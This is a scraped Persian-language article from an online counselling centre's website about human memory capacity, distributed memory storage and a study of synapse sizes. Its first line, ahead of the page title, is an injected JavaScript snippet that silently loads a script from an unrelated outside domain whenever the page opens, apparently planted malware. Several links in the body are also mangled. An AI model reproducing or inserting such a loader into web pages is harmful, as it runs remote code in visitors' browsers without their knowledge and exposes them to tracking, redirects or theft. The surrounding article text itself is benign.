;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); حافظه | مرکز مشاوره آنلاین روان‌یاری

حافظه

میزان پیشرفت خواندن شما

فهرست مطالب

حافظه ما ده برابر حد تصور ظرفیت دارد !

دانشمندان علوم و اعصاب از بررسی های متعدد به این نتیجه رسیدند که ظرفیت مغز انسان به طور تقریبی ده برابر چیزی است که پیش از این تصور می شد و طبق محاسبات کامپیوتری،این میزان ظرفیت معادل یک میلیون گیگابایت فضای ذخیره اطلاعات را شامل می شود.

مغز ما بسیار پیچیده تر و منعطف تر از هارد درایو است و عملکرد بسیار متفاوتی نسبت به آن دارد.

به عبارتی،این مقدار حافظه معادل ظرفیت 31 هزار و 250 گوشی آیفون 7 است که هرکدام 32 گیگابایت گنجایش دارد.تمام این مقدار حافظه در مغز انسان جای گرفته است. مغز ما با رمزگذاری حافظه در تکانه های الکتریکی از طریق پرتاب نورون های عصبی در نقاط مختلف مغز و ایجاد شبکه پیچیده ای از تکانه ها که تفکرات و تجربیات ما را کد گذاری می کنند،کار می کند.

این بدان معناست که برخلاف کامپیوتر که مکان مشخصی برای هر فایل در نظر می گیرد،حافظه در تمام مغز منتشر می شود.مغز انسان واژه ها یا قوانینی را که چگونگی ویرایش آن ها را نشان می دهند ذخیره نمی کند و نیز نمادهای محرک های بصری ذا خلق نمی کنند بلکه آن ها را در حافظه موقت و کوتاه مدت ذخیره کرده و سپس آن را به حافظه بلند مدت انتقال می دهد.

حافظه
http://حافظهhttp://ravanyari.com/%d9%87%d9%88%d8%b4-%d9%85%d8%b9%d9%86%d9%88%db%8c/

کامپیوترها تمام این موارد را انجام میدهند اما موجودات زنده این کار را انجام نمی دهند.اما استعاره از ذخیره کامپیوتری،روش مؤثری برای اختصاص بخشی از ظرفیت مغز به جنبه فکری است و این بدان معنا است که این ظرفیت بزرگ تر ازآن چیزی است که پیش تر تصور میشد زیرا تنوع گوناگونی در سیناپس ها بیش تر از چیزی است که تصور میشد.

محققان بخشی از مغز را که مسئول حافظه بلندمدت است،بازسازی کزدند.آن ها موشی را با کمک مدل سازی سه بعدی کامپیوتری مورد آزمایش قرار دادند تا بتوانند عملکرد حافظه را مورد بررسی قرار دهند.

مغز ما برخلاف کامپیوتر که مکان مشخصی برای هر فایل دارد،حافظه در تمام مغز منتشر می شود.

محققان دانشگاه تگزاس اولین بار که هر کدام از بخش های رشته های عصبی را بازسازی کردند،از شدت پیچیدگی و تنوع میان سیناپس ها شگفت زده شدند.آن ها با این کار مشاهده کردند که یک آکسون به دو سیناپس منتهی به یک دندریت وصل شده بود.

این نشان دهنده آن است که نورون پیام های تکثیر شده را ارسال می کند.پژوهشگران با الگوریتم های تازه ایجاد شده و فناوری های میکروسکوپی،این سیناپس ها را در سطح نانومولکولی بازسازی کردند و توانستند آن ها را با جزئیات بیش تر بررسی کنند .

حافظه
http://حافظهhttp://ravanyari.com/%d9%87%d9%88%d8%b4-%d9%87%db%8c%d8%ac%d8%a7%d9%86%db%8c/

آن ها از تفاوت های بسیار اندک موجود در اندازه جفت های سیناپسی شگفت زده شدند به طوری که تنها حدود هشت درصد تفاوت در اندازه آن ها وجود دارد.این هشت درصد تفاوت اهمیت زیادی دارد.این اندازه ها در قالب کوچک،متوسط و بزرگ بودند.

محققان دریافتند که اگر این سه اندازه بیش تر از این شوند،کمتر از هشت درصد از یکدیگر متمایز می شوند و مغز می تواند با استفاده از اندازه گیری های کمتر پیشرفته،بیشتر از آنچه تصور می شود اطلاعات در خود ذخیره کند.در واقع،اندازه سیناپس ها تغییر می کند تا سیگنالی را که ارسال می کنند،اندازه کرده و تطبیق آن ها را با یکدیگر بیشتر کند.این بدان معناست که اندازه سیناپس ها هر دو یا بیست دقیقه تغییر می کند و از این طریق،خود را با سیگنال های دریافتی هماهنگ می کنند.

  هوش معنوی ( SQ ) چیست؟
حافظه
http://حافظهhttp://ravanyari.com/%d8%a7%d8%b1%d8%aa%d8%a8%d8%a7%d8%b7%d8%a7%d8%aa/
Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.